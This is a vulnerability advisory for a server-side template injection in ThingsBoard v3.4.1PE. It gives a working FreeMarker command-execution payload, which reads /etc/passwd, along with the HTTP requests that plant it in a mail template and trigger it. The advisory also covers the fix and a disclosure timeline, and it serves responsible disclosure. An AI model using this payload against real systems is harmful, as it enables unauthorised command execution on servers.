<h1>usd-2023-0010 | SSTI in ThingsBoard v.3.4.1PE</h1>
<p><strong>Advisory ID</strong>: usd-2023-0010<br />
<strong>Product</strong>: ThingsBoard UI<br />
<strong>Affected Version</strong>: v.3.4.1PE<br />
<strong>Vulnerability Type</strong>: SSTI<br />
<strong>Security Risk</strong>: High (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H)<br />
<strong>Vendor URL</strong>: <a href="https://thingsboard.io/">https://thingsboard.io/</a><br />
<strong>Vendor Status</strong>: Fixed<br />
<strong>CVE number</strong>: Pending<br />
<strong>CVE Link</strong>: Pending<br />
<strong>Last Update</strong>: 2023-08-29</p>
<h3>Description</h3>
<p>ThingsBoard is an open-source IoT platform for data collection, processing, visualization, and device management.<br />
During an assessment, a server-side template injection (SSTI) vulnerability was discovered.<br />
ThingsBoard uses templates for the automated generation of mail content.<br />
The structure of the document is specified by a template into which the data is inserted dynamically.<br />
Many template languages offer additional features, such as performing calculations, evaluating logical operations directly in the template, or even executing operating system commands.</p>
<p>If attackers can create and modify templates dynamically, this poses a high risk to the confidentiality and integrity of the application.<br />
The ThingsBoard UI uses Apache FreeMarker, which is considered Turing-complete and allows executing commands at the operating system level.</p>
<h3>Proof of Concept</h3>
<p>It was discovered that users with permission to modify the email templates are able to execute arbitrary commands on the underlying system.<br />
Such a user needs to modify the default templates and inject a template expression that executes a command. Once the email is sent, the command is executed and its output is embedded in the mail.</p>
<p>As shown at <a href="https://portswigger.net/research/server-side-template-injection">https://portswigger.net/research/server-side-template-injection</a>, command execution through Apache FreeMarker is possible.<br />
To execute <strong>whoami</strong>, the following content must be inserted into the template: <strong>&lt;#assign ex="freemarker.template.utility.Execute"?new()&gt; ${ex("whoami")}</strong>.<br />
In the section <em>White Labeling</em> =&gt; <em>Mail Templates</em>, the existing mail templates can be modified.<br />
The following listing shows the request with the modified mail body.</p>
<pre>POST /api/admin/settings HTTP/1.1
Host: thingsboard.local
Cookie: [SESSION_COOKIE]
Content-Length: 34715
Content-Type: application/json
X-Authorization: Bearer [JWT]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close

{
  "id": null,
  "createdTime": 0,
  "tenantId": {
    "entityType": "TENANT",
    "id": "43ee4ed0-ccf0-11ea-8c84-731415dbf7ca"
  },
  "key": "mailTemplates",
  "jsonValue": {
    "test": {
      "subject": "Test message from ThingsBoard",
      "body": "&lt;#assign ex=\"freemarker.template.utility.Execute\"?new()&gt; ${ex(\"cat /etc/passwd\")}&lt;table class=\"main\" style=\"font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; box-sizing: border-box; border-radius: 3px; width: 100%; background-color: #f6f6f6; margin: 0px auto;\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#f6f6f6\"&gt;\n&lt;tbody&gt;\n&lt;tr style=\"box-sizing: border-box; margin: 0px;\"&gt;\n&lt;td class=\"content-wrap\" style=\"box-sizing: border-box; vertical-align: top; margin: 0px; padding: 20px;\" align=\"center\" valign=\"top\"&gt;\n&lt;table style=\"box-sizing: border-box; border: solid 1px #e9e9e9; border-radius: 3px; margin: 0px; height: 127px; padding: 20px; background-color: #ffffff; width: 600px; max-width: 600px !important;\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\"&gt;\n&lt;tbody&gt;\n&lt;tr style=\"box-sizing: border-box; margin: 0px;\"&gt;\n&lt;td class=\"content-block\" style=\"color: #348eda; box-sizing: border-box; border-radius: 6px; vertical-align: top; margin: 0px; padding: 0px 0px 20px; width: 839px;\" valign=\"top\"&gt;\n&lt;h2&gt;Test message from ThingsBoard&lt;/h2&gt;\n&lt;/td&gt;\n&lt;/tr&gt;\n&lt;tr style=\"box-sizing: border-box; margin: 0px;\"&gt;\n&lt;td class=\"content-block\" style=\"box-sizing: border-box; vertical-align: top; margin: 0px; padding: 0px 0px 20px; width: 600px;\" valign=\"top\"&gt;\n&lt;p&gt;&lt;span style=\"color: #000000;\"&gt;This email is indicating that your outgoing mail settings were set up correctly.&amp;nbsp;&lt;/span&gt;&lt;/p&gt;\n&lt;p&gt;&amp;nbsp;&lt;/p&gt;\n&lt;/td&gt;\n&lt;/tr&gt;\n&lt;tr style=\"box-sizing: border-box; margin: 0px;\"&gt;\n&lt;td class=\"content-block\" style=\"box-sizing: border-box; vertical-align: top; margin: 0px; padding: 0px 0px 20px; width: 600px;\" valign=\"top\"&gt;&lt;span style=\"color: #000000;\"&gt;&amp;mdash; The ThingsBoard&lt;/span&gt;&lt;/td&gt;\n&lt;/tr&gt;\n&lt;/tbody&gt;\n&lt;/table&gt;\n&lt;/td&gt;\n&lt;/tr&gt;\n&lt;/tbody&gt;\n&lt;/table&gt;\n&lt;table style=\"color: #999999; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; box-sizing: border-box; margin: 0px auto; height: 64px; background-color: #f6f6f6; width: 100%;\" cellpadding=\"0px 0px 20px\"&gt;\n&lt;tbody&gt;\n&lt;tr style=\"box-sizing: border-box; margin: 0px;\"&gt;\n&lt;td class=\"aligncenter content-block\" style=\"box-sizing: border-box; font-size: 12px; margin: 0px; padding: 0px 0px 20px; width: 600px; text-align: center; vertical-align: middle;\" align=\"center\" valign=\"top\"&gt;This email was sent to&amp;nbsp;&lt;a style=\"box-sizing: border-box; color: #999999; margin: 0px;\" href=\"mailto:${targetEmail}\"&gt;${targetEmail}&lt;/a&gt;&amp;nbsp;by ThingsBoard.&lt;/td&gt;\n&lt;/tr&gt;\n&lt;/tbody&gt;\n&lt;/table&gt;"
    },
[...]
</pre>
<p>After the template has been modified and the template injection payload inserted in the first line of the body, the mail content generation must be triggered.<br />
The modified template is the one used for test messages, so a test message can be sent with the following request.</p>
<pre>POST /api/admin/settings/testMail HTTP/1.1
Host: thingsboard.local
Cookie: [SESSION_COOKIE]
Content-Length: 397
Content-Type: application/json
X-Authorization: Bearer [JWT]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close

{"id":null,"createdTime":0,"tenantId":null,"key":"mail","jsonValue":{"useSystemMailSettings":false,"mailFrom":"localhost","smtpProtocol":"smtp","smtpHost":"localhost","smtpPort":"25","timeout":"10000","enableTls":false,"tlsVersion":null,"enableProxy":null,"proxyHost":null,"proxyPort":null,"proxyUser":null,"proxyPassword":null,"username":null}}
</pre>
<p>The mail address of the authenticated user then receives a mail.<br />
The first line of the mail body contains the content of <strong>/etc/passwd</strong>, proving that command execution is possible.</p>
<p><img src="https://herolab.usd.de/wp-content/uploads/sites/9/2023/08/ssti_passwd.png" width="832" height="464" alt="" /></p>
<h3>Fix</h3>
<p>It is recommended to define templates statically wherever possible.<br />
If templates are generated dynamically based on user input, it must be ensured that attackers cannot inject template directives or meta-characters.<br />
For this purpose, user input should be escaped before it is inserted into the template.<br />
It is also recommended to use templating engines that are not Turing-complete, so that the template engine is separated from the underlying system.</p>
<h3>References</h3>
<p><a href="https://portswigger.net/research/server-side-template-injection">https://portswigger.net/research/server-side-template-injection</a></p>
<h3>Timeline</h3>
<ul>
<li><strong>2023-04-20</strong>: First contact request via contact form</li>
<li><strong>2023-04-20</strong>: Fix was announced for the upcoming 3.5 release</li>
<li><strong>2023-05-11</strong>: ThingsBoard 3.5 was released</li>
</ul>
<h3>Credits</h3>
<p>This security vulnerability was identified by Gerbert Roitburd of usd AG.</p>